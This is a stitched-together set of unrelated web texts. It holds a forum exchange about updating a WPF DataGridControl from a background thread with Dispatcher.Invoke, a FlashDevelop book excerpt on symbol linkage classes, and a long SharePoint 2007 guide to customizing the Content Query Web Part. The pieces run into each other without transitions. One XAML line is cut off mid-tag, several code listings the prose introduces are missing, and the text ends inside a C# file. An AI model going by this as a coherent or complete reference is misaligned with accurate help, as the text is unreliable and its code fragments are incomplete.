Xceed Support, Member, April 30, 2007 at 9:15 am, Post count: 5658
Concerning the fact that the DataGridControl does not automatically show newly inserted items…
I'd like to have a clarification about your implementation: are you adding the items directly in the database, or do you pass through the DataTable object?
Normally, we receive a notification of addition when an item is added in the DataView (which is the "CollectionView" used by the DataGridControl to display a DataTable; see DataTable.DefaultView). If this notification is effectively not sent when you are updating the DataTable, then I'd like to have more details.
Then, concerning the InvalidOperationException… UI Elements can only be accessed from the UI thread… One easy way to ensure you are executing on the UI Thread is to use the dispatcher for the UI element in question:
grid.Dispatcher.Invoke() and grid.Dispatcher.BeginInvoke() should do the trick!
I’ll be waiting for your feedback concerning the addition of items in the DataTable.
Note: Don’t worry, your English is very good!
Imported from legacy forums. Posted by Marcus [Xceed] (had 263 views)

User (Old forums), Member, April 30, 2007 at 4:36 pm, Post count: 23064
Marcus, you are the best!
Thank you!
The Dispatcher.Invoke() was just what I needed.
Here is the code that did the trick:
…
using System;

namespace WindowsApplication1
{
    public delegate void DelegateZeroParam();

    public partial class App : System.Windows.Application
    {
        …

        void OnInputReady(DataObject newRecord)
        {
            this.dataManager.AddRecord(newRecord); // add the new record to the database
            this.Dispatcher.Invoke(System.Windows.Threading.DispatcherPriority.Normal,
                (DelegateZeroParam)delegate()
                {
                    ((MainWindowClass)this.MainWindow).gridEntries.Items.Refresh();
                });
        }
    }
}
MainWindowClass is the name of my main window class, where the DataGridControl (gridEntries) resides.
After updating the database, the Dispatcher invokes a delegate function, which now has access to the grid. All that's left to do is tell the grid to refresh its items.
As for your question: yes, I use the DataTable to insert new DataRows into the database.
App.cs has a dataManager object which holds a DataSet.
App.cs exposes the DataTables inside the dataManager.dataSet property as public DataTable properties,
i.e.:
public DataTable Entries
{
    get { return this.dataManager.dataSet.Tables["Entries"]; }
}
On MainWindow.xaml the binding is done like so:
<xcdg:DataGridControl x:
The updating of the database is actually done in a separate data access layer project within this solution. The product of this project is the dataManager object I use in App.cs.
I use predefined stored procedures for handling all database functionality.
Again, thank you Marcus.
I was not aware of the UI thread in WPF, nor of using the Dispatcher.
I hope this post will help others having the same problem as I did.
Imported from legacy forums. Posted by Golan (had 3621 views)
The reason Flash does this is because it needs a point of reference to be able to instantiate that symbol on the stage if it is used in script somewhere. To see the evidence of this, you can look at all the classes embedded in a compiled SWF inside of FlashDevelop. In Fig. 4.1, you can see the Flash library on the left, with the symbol exported with the name "square" and reflected on the right in the FlashDevelop project panel with the classes used in the SWF.
If you had a class defined for the square, it would use that file rather than generating its own. To see the result of this, we can rename the linkage class for the symbol from "square" to uppercase "Square" to match the name of a class I have defined for it.
package {
    import flash.display.Sprite;

    public class Square extends Sprite {
        public function Square() {
            rotation = 45;
        }
    }
}
Now, when the square is added to the stage, it will be rotated 45 degrees.
Class versus Base Class
When you open the linkage panel to assign a class to a symbol,
there is an additional field that is used to define the base class for a
symbol. The base class symbol is where you define what class you
would like to extend for that symbol. In the previous example, the
Square class extended from Sprite, so the base class for that symbol
was flash.display.Sprite, as shown in Fig. 4.2 .
Figure 4.1 FlashDevelop can reveal the classes used in a SWF.
Customizing the Content Query Web Part in SharePoint Server 2007
Summary: Walk through how to customize the Content Query Web Part (CQWP) in Microsoft Office SharePoint Server 2007 to query content across multiple sites in a site collection and display the results in any way that XSL can support. Learn how to get similar results when customizing the CQWP does not meet your needs. (20 printed pages)
Robert Bogue, Thor Projects
January 2010
Applies to: Microsoft Office SharePoint Server 2007
Download the code samples that accompany this article: SharePoint Content Query Web Part Examples
Contents
Introduction to SharePoint Content Query Web Part Customization
Scenario: Crafting Custom Queries for the Content Query Web Part
Customizing the Content Query Web Part Using the UI and the *.webpart File
Deriving a Class for the Content Query Web Part
Replacing the Content Query Web Part with SPSiteDataQuery or Search
Introduction to SharePoint Content Query Web Part Customization
The Content Query Web Part (CQWP) in Microsoft Office SharePoint Server 2007 provides important features for SharePoint users. Office SharePoint Server Web Parts generally work on a single list or library. That means that when users are presented with information, they are seeing information from just one place. However, in most organizations there is a real need to aggregate content over multiple lists and libraries and to present this content to the user in a single, unified view. Situations such as rolling up news from multiple departments are all too common in most organizations.
Although it is certainly possible that you can write your own Web Part to query multiple lists, it is also possible that you can run into performance issues that can make your entire system less responsive. The CQWP is designed specifically to take advantage of the SharePoint platform and to be minimally intrusive from a performance and scaling perspective. This design includes use of the SPSiteDataQuery objects to execute one search on an entire site collection and the extensive use of caching.
The core benefit of the CQWP is to aggregate content from all of the subsites, lists, and libraries so that the content can be displayed in a single view. After the data is queried and returned, the view is rendered by using a set of XSL templates to transform the data into HTML. The CQWP is flexible in its ability to change the XSL—and therefore the display generated by the CQWP—and in the options it provides for querying the information from the site.
With the ability to limit the query to a list type, a content type, and a subtree of URLS, the CQWP already provides a lot of flexibility directly from the UI (UI). In addition, you can export the CQWP and directly change some of the information that is not in the UI, enabling you to create custom queries for the CQWP to use.
Scenario: Crafting Custom Queries for the Content Query Web Part
This article examines creating custom queries for the CQWP, and how its architecture affects how you can and cannot use it. In this example, two departments, public relations (PR) and human resources (HR), both need to communicate with the employees of the organization on the home page. Instead of having two Web Parts on the home page, one with PR information and the other with HR information, the organization decides to include content from both departments on the home page in the same Web Part. Each department will also have a Web Part on its home page that shows only its news.
To start, both the HR and PR sites are subsites of a single site collection. The news for both PR and HR will be based on child content types of a News content type. All of the content types will be set up in the root of the site collection. HR will have an Internal News content type and PR will have a Press Release content type. With this configuration the news from the sites can be rolled up by using the UI of the CQWP.
The HR site will have more subsites from which news will roll up to the home page, but HR does not want the subsites on the HR home page. This will require editing the properties that cannot be modified through the UI by editing the
*.webpart file. The HR department also wants to display news for a custom date range, which requires extending the CQWP to accept parameters.
Finally, we look at a scenario where there is a separate site collection for HR and PR, so the CQWP will not be able to roll up news. Instead, we can replace the CQWP with the SPSiteDataQuery object or search—alternatives which support content from separate site collections.
Customizing the Content Query Web Part Using the UI and the *.webpart File
The UI for the CQWP is the familiar tool pane interface that is used with all Web Parts. The interface is designed to enable the most common query and presentation options and the standard Web Part options, such as title and chrome. Despite the flexible UI for the CQWP, several properties and complex configurations are not available. For certain settings, you must export the Web Part and edit the
*.webpart file manually. As you may know, a
*.webpart file is an XML file that contains the information needed to load and configure the actual WebPart object.
SharePoint Server enables you to export the configuration of most Web Parts by selecting Export from the Web Part menu, as shown in Figure 1.
Figure 1. Web Part edit menu
By selecting Export, you can save the configuration of the Web Part into a
*.webpart file, which is simply an XML file with the class (.NET type) to load, and the configuration for that type. Many Web Parts have properties in their
*.webpart files that are not shown in the UI. As an example, the following code shows the output from a CQWP. In this listing, the individual properties are reordered to improve readability and XML comments are added to make it easier to locate the properties of the CQWP as I describe them in this article.
<?xml version="1.0"?>
<webParts>
  <webPart xmlns="">
    <metaData>
      <type name="Microsoft.SharePoint.Publishing.WebControls.ContentByQueryWebPart, Microsoft.SharePoint.Publishing, Version=12.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c"/>
      <importErrorMessage>Cannot import this Web Part.</importErrorMessage>
    </metaData>
    <data>
      <properties>
        <!-- Properties from ContentByQuery -->
        <!-- ContentByQuery - Property Overrides -->
        <property name="ListsOverride" type="string"/>
        <property name="QueryOverride" type="string"/>
        <property name="ViewFieldsOverride" type="string"/>
        <property name="WebsOverride" type="string"/>
        <!-- Overridden by ListsOverride -->
        <property name="ServerTemplate" type="string">850</property>
        <!-- Overridden by QueryOverride -->
        <property name="AdditionalFilterFields" type="string" null="true"/>
        <property name="AdditionalGroupAndSortFields" type="string" null="true"/>
        <property name="BaseType" type="string"/>
        <property name="ContentTypeBeginsWithId" type="string"/>
        <property name="ContentTypeName" type="string">Article Page</property>
        <property name="Filter1ChainingOperator" type="Microsoft.SharePoint.Publishing.WebControls.ContentByQueryWebPart+FilterChainingOperator, Microsoft.SharePoint.Publishing, Version=12.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c">And</property>
        <property name="Filter2ChainingOperator" type="Microsoft.SharePoint.Publishing.WebControls.ContentByQueryWebPart+FilterChainingOperator, Microsoft.SharePoint.Publishing, Version=12.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c">And</property>
        ...
      </properties>
    </data>
  </webPart>
</webParts>
After you have a
*.webpart file and have made the changes that you want, you can import the
*.webpart files into SharePoint Server.
To import a *.webpart file
To place the page in Edit mode, on the Site Actions menu, click Edit Page.
Click an Add a Web Part button on one of the Web Part zones on the page.
In the Add Web Parts dialog box that opens, click the Advanced Web Part gallery and options link.
In the catalog zone that appears on the right, click the drop-down arrow to the right of Browse, and then click Import, as shown in Figure 2.
Figure 2. Catalog Zone Import menu
In the catalog zone, click Browse to open the Windows common file dialog box. Select your
*.webpart file, and then click Open.
Click Upload.
After the
*.webpart file is uploaded, click Import.
Modifying the UI properties drives changes in the
*.webpart file, and using the
*.webpart files offers a convenient way to reuse the configuration settings whether or not you need to make direct changes to the file. The following sections review the major areas of the tool pane and how you can use these to change the properties you find in the
*.webpart file.
CQWP Query UI
The Query UI of the tool pane includes sections for the source, list type, content type, audience targeting, and filters. These sections enable the CQWP to construct and execute a query by creating an instance of an SPSiteDataQuery object.
Source Section
The Source section shows three sources that the CQWP can use, as shown in Figure 3.
Figure 3. Source section UI
This section enables the user to select areas of the site collection (or another site collection) to include in the search and sets the WebUrl and ListGuid properties of the CQWP. When you select the first option, to search within the current site collection, neither the WebUrl nor the ListGuid is assigned a value. If the second item is selected, to get items from another site, the WebUrl is set to the selected site. If you select the third option, to get items from a specific list, the WebUrl is set to the Web site containing the list and the list's GUID is added to the ListGuid property. The WebsOverride property, discussed in detail later in this article, is not included in the UI. It would enable you to control whether only the Web is searched or whether the entire site collection is searched when the ListGuid is not present.
List Type Section
The List Type section enables you to select the type of list to include results from, as shown in Figure 4. These options filter the results to only those items found in the specified types of lists.
Figure 4. List Type section UI
This list includes only the default templates and sets the ServerTemplate property of the CQWP. However, you can manually set the ServerTemplate property to the GUID of the feature that installs your custom list, or override the entire SPSiteDataQuery.Lists property by setting the ListsOverride property in the
*.webpart file, as described later in this article.
Content Type Section
Perhaps the most powerful option within the CQWP is the ability to filter results by a content type and the child content types. Figure 5 shows the three-part identification of content types that exists in the Content Type UI.
Figure 5. Content Type section UI
The first selection to make is the group to which the content type belongs. This filters the second drop-down list, which shows the available content types. Unlike the List Type drop-down list, which shows only built-in lists, the Content Type group and items drop-down lists show all of the content types in the current site. The final check box indicates whether to include child content types and changes the property that is set in the CQWP. If the Include child content types check box is selected, the ContentTypeBeginsWithId property is set to the content type identifier (ID) for the content type. If the check box is not selected, the ContentTypeName property is set. The CQWP will execute a query with the "begins with" operator against the ContentTypeId for the value in the ContentTypeBeginsWithId property, or an "equal" operator against the ContentType for anything in ContentType name.
Including child content types is a great way to limit your results to a type of content while enabling users and other developers to derive from your content types. For example, you can filter to the News content type while allowing the HR department to have their own HR news content type that is derived from the News content type.
Audience Targeting Section
One of the key features in SharePoint Server is the ability to target information to users. You can do this by using Web Part targeting, where only certain sets of users can see a Web Part. You can also do it by specifying audiences on the information itself. The CQWP can process this audience targeting information when returning information to users. As shown in Figure 6, the Audience Targeting section consists of two check boxes.
Figure 6. Audience Targeting section UI
The first check box sets the FilterByAudience property. The second check box sets the ShowUntargetedItems property. As the property name implies, setting a target for content is not required. By selecting this check box, you can show untargeted content. In most cases, untargeted content is intended for all users.
Additional Filters Section
The place to provide filtering on a per-field-value basis is the Additional Filters section. This section enables you to logically "and" or logically "or" up to three individual field queries together. Figure 7 shows the UI for these filters.
Figure 7. Additional Filters section UI
Each one of the filters sets four fields. The first filter, for example, sets FilterField1, FilterType1, FilterOperator1, and FilterValue1. FilterField is the GUID for the site column to match to. The FilterType is the type of the field from the SPFieldType enumeration. The FilterOperator is one of the values from the Microsoft.SharePoint.Publishing.WebControls.ContentByQueryWebPart.FilterFieldQueryOperator enumeration. One other set of properties is controlled by this block: the Filter?ChainingOperator fields (where ? is 1 or 2). These are the operators that "or" or "and" the values in the filtered fields together.
In addition to the filtering for content types, these basic combinations can handle most query needs. However, if the query need for the Web Part is complex, you can override the query altogether, including both the filtering here and the sorting and grouping described in the following section, by setting the QueryOverride property.
CQWP Presentation Group UI
The Presentation group consists of a Grouping and Sorting section, a Styles section, and a Feed section.
Grouping and Sorting Section
The Grouping and Sorting section, as shown in Figure 8, orders the results that are returned from the query.
Figure 8. Grouping and Sorting section UI
The initial Group items by option controls which field is used to group items together. This is set in the GroupBy field as the GUID of the field. The GroupByFieldType is also set to the SPFieldType enumeration value for the type of field that is being used.
The direction of grouping is specified in the GroupByDirection field as a value from the enumeration Microsoft.SharePoint.Publishing.WebControls.ContentByQueryWebPart.SortDirection. The number of columns, which is used in the presentation of the results, is stored in the DisplayColumns property.
The next section for sorting uses the properties SortBy, SortByFieldType, and SortByDirection with the same types of values as were used for the grouping fields.
The last group of items in this section enables you to limit the maximum number of records returned, which sets the ItemLimit property that is provided to SPSiteDataQuery as RowLimit. This is particularly useful when you want to show only a few items, such as on the home page.
Styles Section
The Styles section provides two drop-down lists for selecting the group and styling items, as shown in Figure 9.
Figure 9. Styles section UI
The Styles section sets the GroupStyle and ItemStyle properties, which are used to select which formatting template in the XSL files to use to display the results. The structure of the XSL files and how these values relate are described in detail in Customizing the User Experience.
Feed Section
The final section in the Presentation group, Feed, enables the user to control the visibility of a feed link and the feed's title and description, as shown in Figure 10.
Figure 10. Feed section UI
The Feed section sets the FeedEnabled property to true or false. It also sets the FeedTitle and FeedDescription properties to the values provided.
Changing the CQWP Query
The preceding section describes how UI changes drive changes in the properties of the CQWP, and how you can use those settings to create queries that return the results you need. However, the CQWP is extensible beyond the capabilities of the UI. Figure 11 shows the properties of the CQWP and their relationship to the SPSiteDataQuery object that the CQWP uses. The green boxes are properties that can be set from the UI and the blue boxes are properties that must be set by directly editing the Web Part file. In the diagram, you can see how many individual properties that are set in the UI roll up into a set of properties that are used for the SPSiteDataQuery object. In addition to being able to manually set the values that can be set through the UI, you can also set "override" properties that will override the normal generation of the fields that the SPSiteDataQuery needs.
Figure 11. CQWP properties and their relationship to SPSiteDataQuery
The UI provides a set of properties that should meet the needs of most casual users. The additional properties that are available through the
*.webpart file enable more powerful settings that cannot be specified in the UI.
The first property, QueryOverride, is used to override the actual Collaborative Application Markup Language (CAML) that is being executed. The properties WebsOverride and ListsOverride provide important controls on whether subsites are crawled and the lists to include in the search. The properties CommonViewFields and ViewFieldsOverride are used to control what fields are returned in the results set. This is necessary so that the XSL (discussed in the next section) has the additional information needed to be able to display.
QueryOverride Property
When executing a query via SPQuery or SPSiteDataQuery, you can provide a CAML fragment that specifies the query (equivalent to the SQL WHERE clause) and the order (equivalent to the SQL ORDER BY clause). These two CAML fragments control the results that are returned and their order. By default, the CQWP builds this CAML query from the fields specified in the UI. However, by setting the QueryOverride property in the
*.webpart file, you can manually specify these values.
This is useful when you need to include multiple content types that do not have the same parent or include results filtered by more than three fields, or in cases where you want to provide more than one sorting field. Any query that can be executed by SPSiteDataQuery can be supplied to QueryOverride.
Because the properties in the XML file cannot contain embedded XML, any CAML that you need to add to a property must either be encoded or enclosed within a <CDATA> tag which begins with <![CDATA[ and ends with ]]>.
Setting the QueryOverride causes the CQWP to ignore all of the filtering, grouping, and sorting options that are set in the UI.
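As a sketch of what this looks like, a QueryOverride that limits results to items modified in the last seven days, newest first, could be added to the *.webpart file roughly as follows. The CAML here is illustrative: Modified is a standard field, and the seven-day window stands in for whatever date range is actually needed.

```xml
<property name="QueryOverride" type="string"><![CDATA[
  <Where>
    <Geq>
      <FieldRef Name="Modified"/>
      <Value Type="DateTime"><Today OffsetDays="-7"/></Value>
    </Geq>
  </Where>
  <OrderBy>
    <FieldRef Name="Modified" Ascending="FALSE"/>
  </OrderBy>
]]></property>
```

Note the CDATA wrapper, which is required because property values cannot contain raw embedded XML.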
WebsOverride Property and ListsOverride Property
By default, the CQWP executes its searches across an entire site collection; however, you can prevent the CQWP from recursing into subsites. You do this by overriding the WebsOverride property and setting it to <Webs />. If you want to specify the value of the property and still allow subsites, you can specify <Webs Scope='Recursive'/>, which will recurse subsites. You can also set the value to <Webs Scope='SiteCollection' /> so that all results from the site collection are returned.
The ListsOverride property is created by the CQWP normally by using the ServerTemplate value that is specified in the UI. However, the SPSiteDataQuery that the CQWP uses has a default that limits the maximum number of lists that can return data to 1,000. There may be situations where this value must be overriden. If so, you set the ListsOverride exactly as you would provide the value to the SPSiteDataQuery.List property. To limit the search to pages libraries and specify a maximum of 2,000 lists, the value would be as follows.
In the
*.webpart file, this would look like the following.
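Following the SPSiteDataQuery.Lists schema (850 is the server template ID for Pages libraries), the value and its *.webpart form would take roughly this shape; treat the exact attribute names as a sketch:

```xml
<Lists ServerTemplate="850" MaxListLimit="2000"/>
```

and wrapped as a property in the *.webpart file:

```xml
<property name="ListsOverride" type="string"><![CDATA[<Lists ServerTemplate="850" MaxListLimit="2000"/>]]></property>
```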
CommonViewFields and ViewFieldsOverride
After you get the right rows back, it is important to get the right information in those rows. If the information is not in the row, the XSL cannot display it to the user. The CQWP offers two key ways to do this: CommonViewFields and ViewFieldsOverride.
CommonViewFields is a simpler way to add fields because the value in CommonViewFields is the internal name of the field followed by a comma and its type from SPFieldType. Individual fields are separated by semicolons. CommonViewFields is also simpler than ViewFieldsOverride because you do not have to reference all of the fields that the CQWP includes by default. Even without any field settings, the CQWP will include a default set of fields that the XSL expects to receive.
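For example, to also return an article date and a comments column (the internal field names here are hypothetical), CommonViewFields could be set in the *.webpart file like this:

```xml
<property name="CommonViewFields" type="string">ArticleStartDate,DateTime;Comments,Note</property>
```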
Using the ViewFieldsOverride property is more challenging because it requires that you include all of the default fields plus the fields you want to add. However, if you want to add the title of a site or list to the output, it is the only way to accomplish this. If you want to add your own fields via ViewFieldsOverride, you can start by adding the following and simply appending your fields. The following represents all of the fields that are included natively by CQWP.
<FieldRef ID="{fa564e0f-0c70-4ab9-b863-0177e6ddd247}" Nullable="True" Type="Text" /> <!-- Title --> <FieldRef ID="{94f89715-e097-4e8b-ba79-ea02aa8b7adb}" Nullable="True" Type="Lookup" /> <!-- FileRef --> <FieldRef ID="{1d22ea11-1e32-424e-89ab-9fedbadb6ce1}" Nullable="True" Type="Counter" /><!-- ID --> <FieldRef ID="{28cf69c5-fa48-462a-b5cd-27b6f9d2bd5f}" Nullable="True" Type="DateTime" /><!-- Modified --> <FieldRef ID="{1df5e554-ec7e-46a6-901d-d85a3881cb18}" Nullable="True" Type="User" /><!-- Author --> <FieldRef ID="{d31655d1-1d5b-4511-95a1-7a09e9b75bf2}" Nullable="True" Type="User" /><!-- Editor --> <FieldRef ID="{8c06beca-0777-48f7-91c7-6da68bc07b69}" Nullable="True" Type="DateTime" /><!-- Created --> <FieldRef ID="{543bc2cf-1f30-488e-8f25-6fe3b689d9ac}" Nullable="True" Type="Image" /> <!-- PublishingRollupImage --> <FieldRef ID="{43bdd51b-3c5b-4e78-90a8-fb2087f71e70}" Nullable="True" Type="Number" /> <!-- Level --> <FieldRef ID="{9da97a8a-1da5-4a77-98d3-4bc10456e700}" Nullable="True" Type="Note" /> <!-- Comments --> <FieldRef ID="{61cbb965-1e04-4273-b658-eedaa662f48d}" Nullable="True" Type="TargetTo" /><!-- Audience -->
Notice the Nullable="True" attribute. This tells the CQWP that the row can be returned even if the row does not contain the field. For your fields, you may or may not want to filter the results based on whether the field you are attempting to return exists in the row. Also, notice that you do not want to include the XML comments in the preceding listing in your actual ViewFieldsOverride because the SPSiteDataQuery that CQWP uses does not allow comments in the CAML for view fields. The preceding comments are designed to help you understand what the GUID refers to.
In addition to your own FieldRefs, you can also add the name of the site and the name of the list that the item came from by adding <ProjectProperty Name="Title"/> and <ListProperty Name="Title"/> to the ViewFieldsOverride. These fields will appear in the output as ProjectProperty.Title and ListProperty.Title, respectively. These fields can be useful if you want to show where the data came from.
For more information about displaying additional fields in the CQWP, see How to Display Custom Fields in the Content Query Web Part.
Customizing the User Experience
Now that the query is returning the right results, you can transform those results into the HTML that the users expect. That requires working with the three XSL files that the CQWP uses to transform the data into HTML, knowing what the data that is returned looks like, and having a set of knowledge and tools to make the process easier.
How CQWP Transforms Data into HTML
The SPSiteDataQuery that the CQWP uses to run its query can easily return the results as an XML stream. After the results are in an XML stream, you can use industry-standard XSL to transform the XML into HTML for display. Transforming XML to HTML is generally performed with one XSL file, but to maintain consistency among the three publishing Web Parts that transform information (Summary Links and Table of Contents are the other two), and to minimize the amount of XSL in any one file, the CQWP uses three different XSL files in the transformation. The properties and the files for these are:
MainXslLink By default, points to ContentQueryMain.xsl in the Style Library. This is the starting point for the XSLT transformation.
HeaderXslLink By default, points to Header.xsl in the Style Library. Header.xsl is responsible for the group styling. To add new group styling options, you add them to this file.
ItemXslLink By default, points to ItemStyle.xsl in the Style Library. ItemStyle.xsl is responsible for individual row styling. New row styling options are added to this file.
Understanding how these three files work together to render the HTML output is essential because the CQWP has dependencies on specific items in the XSL files. That makes using simple XSL techniques to dump out the incoming XML more difficult.
The processing flow for the XSLT transformation starts in ContentQueryMain.xsl (the file pointed to by MainXslLink) with a match for "/" (the root node), which directly calls the OuterTemplate template. OuterTemplate determines whether the result set is empty. If it is empty and the mode is Edit, it displays the message that the CQWP passed in as a variable. If, however, the result set is not empty, OuterTemplate calls the OuterTemplate.Body template. In either case, if the feed is enabled, then the feed is added.
The OuterTemplate.Body template organizes the results into groups and columns. It does this by calling OuterTemplate.CallHeaderTemplate and OuterTemplate.CallFooterTemplate at the appropriate times. It adds hard-coded separators for the columns between items as needed.
OuterTemplate.CallHeaderTemplate calls the appropriate template in Header.xsl by using <xsl:apply-templates> with the current node and a mode of "header". In the Header.xsl file pointed to by the HeaderXslLink property, the templates include match criteria that test the value of the GroupStyle attribute, and a mode of "header". Thus, OuterTemplate.CallHeaderTemplate calls the correct group styling in the header file. The matching mode attributes of <xsl:template> and <xsl:apply-templates> ensure that the matching template is one of the header templates.
OuterTemplate.CallFooterTemplate does not call any templates, but instead emits a static <div> tag with an identifier of "footer".
After OuterTemplate.Body has made the appropriate calls for grouping, it makes a call to OuterTemplate.CallItemTemplate, which in turn calls templates in the ItemStyle.xsl file pointed to by the ItemXslLink property. It does this, generically, by using <xsl:apply-templates> with a mode of "ItemStyle". The <xsl:template> elements in ItemStyle.xsl include the same mode of "ItemStyle" and a match for the Style attribute. ContentQueryMain.xsl provides specific handling for the NewsRollUpItem, NewsBigItem, and NewsCategoryItem styles because the templates for these styles require additional parameters.
In addition to the templates mentioned previously, there are numerous other templates in the three files that are used for string processing and other utility purposes.
Raw XML Results
Knowing how the data is processed at a high level is a big start to developing your own group and item styles. However, not knowing exactly what the data looks like coming into an XSLT transformation can make building and debugging problems nearly impossible. In most applications of XSLT transformation, you can simply create an XSL file that contains the following.
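A minimal dump stylesheet of that kind can be sketched as follows (a reconstruction matching the description below, not the article's verbatim listing):

```xml
<xsl:stylesheet version="1.0"
                xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <!-- Match the root node, copy everything inside it, and wrap it in <xmp>
       so the browser renders the XML literally instead of parsing it. -->
  <xsl:template match="/">
    <xmp>
      <xsl:copy-of select="*" />
    </xmp>
  </xsl:template>
</xsl:stylesheet>
```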
This code says, effectively, match the root element and select everything inside it and dump it out. The <xmp> tag is an obsolete HTML tag that renders everything inside it instead of trying to decode it as additional markup. This prevents the need to escape all of the output of the XML for display on an HTML page.
If you replace ContentQueryMain.xsl with just this, you get an error from the CQWP, because the CQWP expects certain pieces of the ContentQueryMain.xsl file to be available, including the incoming parameters. To dump the raw XML, you would not replace the entire ContentQueryMain.xsl file. Instead, you would replace the existing XSL template that matches the root node. On line 27 of ContentQueryMain.xsl, you should see the template, which looks like the following.
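That template is the root match that hands control to OuterTemplate; a reconstruction (not the verbatim shipped file) looks like this:

```xml
<xsl:template match="/">
  <xsl:call-template name="OuterTemplate" />
</xsl:template>
```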
When you change this to the XSL provided earlier, the output of the CQWP should now be the raw XML provided as input. Of course, making a change to ContentQueryMain.xsl in production is a bad idea, because suddenly every CQWP will start dumping out the raw XML instead of the transformed content. That's why it's important to be able to reference a different XSL file for your CQWP, especially for testing.
Referencing Different XSL
The previous section provided the properties in the CQWP that reference the three files that the CQWP uses. These properties are essential so that you can create CQWP instances where the display is unique for a site. By copying the existing ContentQueryMain.xsl, Header.xsl, and ItemStyle.xsl into your own files and changing the MainXslLink, HeaderXslLink, and ItemXslLink properties of your CQWP's *.webpart file, you can work on a completely separate set of styles from those provided by default. You can also avoid the potential that an update will overwrite your hard work.
While the XSL files for most of the transformation just require changes to the CQWP properties in the *.webpart file, making changes to the Really Simple Syndication (RSS) feed and how it is displayed is a bit more complicated.
Changing the RSS Feed for the CQWP
Each CQWP in SharePoint Server can expose an RSS feed. RSS feeds are readable through a set of RSS reader programs, including the RSS reader included in Internet Explorer 7 (and Internet Explorer 8) and in Outlook 2007. RSS feeds from CQWPs enable you to create news feeds for your site that mirror the items in the CQWPs on the site and that are cached like a regular CQWP.
The RSS feed is enabled through the UI as described earlier. The output of the RSS feed from the CQWP is customizable beyond the title and description available in the UI. To customize the RSS feed, you need to understand how the RSS link is created.
On line 54 of ContentQueryMain.xsl is a definition for a variable named FeedUrl1, as shown here.
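The definition can be sketched roughly as follows (a reconstruction based on the description below; $WebUrl, $PageUrl, and $WebPartId are placeholder parameter names, and the shipped file may spell them differently):

```xml
<!-- Sketch only: builds the feeds.aspx URL from parameters the CQWP
     passes into the XSL. -->
<xsl:variable name="FeedUrl1"
    select="concat($SiteUrl, $FeedPageUrl,
                   '?xsl=1&amp;web=', $WebUrl,
                   '&amp;page=', $PageUrl,
                   '&amp;wp=', $WebPartId)" />
```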
The SiteUrl and FeedPageUrl are parameters that the CQWP passes into the XSL. SiteUrl is the URL of the current site, and FeedPageUrl is _layouts/feeds.aspx. In the previous code, you can see that the Web, page, and WebPartId are passed to the RSS page, Feeds.aspx. These parameters allow the page to get an instance of the CQWP Web Part from the SPLimitedWebPartManager, and thereby to get the query results back from the CQWP. This is how the page fetches the data necessary for the RSS feed results. The one additional parameter on the query string that is not needed to fetch the results is the XSL parameter. This parameter sets which XSL will be used to transform the results from the CQWP into the RSS feed.
The value provided in the XSL parameter matches entries in the web.config file's <appSettings> tag. By default, SharePoint includes the following entry in the web.config of the Web applications it creates.
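A sketch of that entry (the FeedXsl1 key name follows from the prefix/suffix description below; the value path is an assumption based on the default Style Library layout):

```xml
<appSettings>
  <!-- key = prefix "FeedXsl" + suffix "1"; the value path is illustrative -->
  <add key="FeedXsl1" value="/Style Library/XSL Style Sheets/Rss.xsl" />
</appSettings>
```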
The value here is in two parts: the prefix FeedXsl and the suffix 1, which matches the default XSL parameter passed into Feeds.aspx. The suffix can be any value provided to the feeds.aspx page, alphabetic or numeric. Obviously, modifying the web.config file of SharePoint Server is problematic, particularly in a farm, so modifying the RSS feed requires more configuration management than the previously described solutions for changing the output of the CQWP directly.
To change the way that RSS feeds are generated:
1. Create a new Rss.xsl with the changes.
2. Add an <appSettings> entry for the new Rss.xsl file with a new suffix.
3. Create a new ContentQueryMain.xsl that passes the new XSL parameter.
4. Customize the *.webpart file for the CQWP to reference the new ContentQueryMain.xsl file.
You can use these steps to customize the output of the RSS to include only parts of the articles, or to inject other parts of the RSS standard that the built-in transformation does not provide.
For more information about customizing the RSS feed, see How to Customize RSS for the Content Query Web Part.
Working with XSL
If you do not work with XSL every day, it can be a daunting task to stare at the over 600 lines of XSL that make up the three XSL files that CQWP uses to transform the query results and start to work with them. Fortunately, there are tools and references that you can use to make the XSL editing process easier.
Tools
Microsoft's development platform, Microsoft Visual Studio (2005 or later), includes an XML editor with XSL support. The editor includes the ability to view the XSL output and the ability to debug the XSL. Admittedly, Visual Studio's ability to run the XSLT transformation is of limited use, because the dependencies between the CQWP and the XSL make it impossible to run the XSL outside of the CQWP.
Microsoft Office SharePoint Designer 2007 also includes an XML and XSL editor you can use to modify the XSL files that the CQWP uses. The benefit of SharePoint Designer as an XML or XSL editor is that it can save files directly into SharePoint Server. This can make the editing cycle for making changes to the CQWP easy.
Finding XSLT References
If you are trying to learn XSL and need a reference guide, Microsoft provides a complete XSLT Reference. You can also use the article How to: Customize XSL for the Content Query Web Part for a step-by-step walkthrough of the customization process.
Troubleshooting CQWP Issues
CQWP issues generally occur in one of two phases. The first phase, where most trouble occurs, is query generation. However, problems can also occur during the second phase, the creation of the view.
Query Generation
Because the CQWP uses SPSiteDataQuery and you can override the CAML used to execute the query, the results from the CQWP exhibit the same exacting precision as the SPSiteDataQuery object. This means that a single error in one of the CAML values that you can override—WebsOverride, ListsOverride, QueryOverride, or ViewFieldsOverride—can mean that you get an error or, more likely, simply get no results.
The easiest thing to do is to check your results with a direct call to SPSiteDataQuery to see if there is an error returned, and to make quick changes to values to see if you can determine the issue. The code provided as a part of this article includes a Web Part that calls SPSiteDataQuery and exposes the four fields so that they can be edited in the UI. You can use this tool to see how the SPSiteDataQuery is responding to the CAML fragments that you provide to it.
One of the most common problems is not referring to a field by its internal name. Referring to a field by its display name leads to an error.
View Generation
View generation issues generally fall into two categories. Either the field that you're trying to use is not available because it has a different name or was not included, or the XSL that you are using to create the display is incorrect.
Most frequently the field is not included in the ViewFieldsOverride. To verify that you are receiving the data you expect, you can replace your XSL with the XSL discussed earlier in the section Raw XML Results.
Deriving a Class for the Content Query Web Part
The CQWP, also known as Microsoft.SharePoint.Publishing.WebControls.ContentByQuery, is not a sealed class. This means that classes can be derived from it and thereby extended with new functionality. One of the common requests for the CQWP is to be able to parameterize the query so that one CQWP can serve different content based on the page or a query string parameter. To demonstrate this, you can derive a class from the CQWP and add the ability to use Web Part connections for the three filter values that the CQWP can accept. The following code example shows that deriving a class from the CQWP is straightforward.
using System;
using System.Runtime.InteropServices;
using System.Web.UI.WebControls.WebParts;
using Microsoft.SharePoint;
